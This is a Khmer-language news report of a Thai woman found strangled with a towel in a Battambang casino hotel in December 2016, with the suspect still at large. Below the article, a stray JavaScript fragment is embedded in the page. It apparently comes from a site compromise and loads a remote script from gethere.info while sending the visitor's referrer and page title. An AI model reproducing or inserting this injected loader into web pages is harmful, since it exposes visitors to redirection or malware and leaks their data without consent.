Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

ស្ត្រីថៃម្នាក់ត្រូវឃាតក សម្លាប់ចោលក្នុងសណ្ឋាគា កាសុីណូ ហ្វ្រាណាសុី ស្រុកកំរៀង ដោយមិនដឹងមូលហេតុ

បាត់ដំបង៖ស្ត្រីជនជាតិថៃម្នាក់ត្រូវបានឃាតក មិនស្គាល់អត្តសញ្ញាណ សម្លាប់ចោលក្នុងសណ្ឋាគារមួយកន្លែង ដោយពុំដឹងមូលហេតុ បង្កអោយមានការភ្ញាក់ផ្អើលដល់សមត្ថកិច្ចចុះធ្វើការស្រាវជ្រាវ។  ហេតុការណ៌នេះបានកើតឡើងកាលពីវេលាម៉ោង១រសៀល ថ្ងៃទី២០ ខែធ្នូឆ្នាំ២០១៦ នៅចំណុចសណ្ឋាគា កាសុីណូ ហ្វ្រាណាសុី បន្ទប់លេខ២១៧ ស្ថិតក្នុងភូមិដូង ឃុំបឹងរាំង ស្រុកកំរៀង ខេត្តបាត់ដំបង។

មន្ត្រីអាវុធហត្ថស្រុកកំរៀងបានបញ្ជាក់ថា ឃាតក ប្រើប្រាស់កន្សែងសាច់ក្រណាត់ប៉ាក់រឹតក សម្លាប់ជនរងគ្រោះឈ្មោះ មនី ឆៃបុត្រ ភេទស្រី អាយុ៤៤ឆ្នាំ ជនជាតិថៃរស់នៅភូមិអងងិន ស្រុកសៃម៉ៃ ក្រុងថេបមហានគរ បណ្តាលអោយជនរងគ្រោះស្លាប់នៅនឹងកន្លែង ហើយជនសង្ស័យបានគេចខ្លួនបាត់។

តាមការសន្និដ្ឋានរបស់សមត្ថកិច្ចជនសង្ស័យជាមនុស្សស្រីជនជាតិថៃដូចគ្នា។បច្ចុប្បន្នសមត្ថកិច្ចយើងកំពុង សហការជាមួយប៉ូលីសថៃ ស្រាវជ្រាវរកជនសង្ស័យ។ចំណែកសាកសពសមត្ថកិច្ចបានបញ្ជូនទៅប្រទេសថៃរួចហើយ។

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More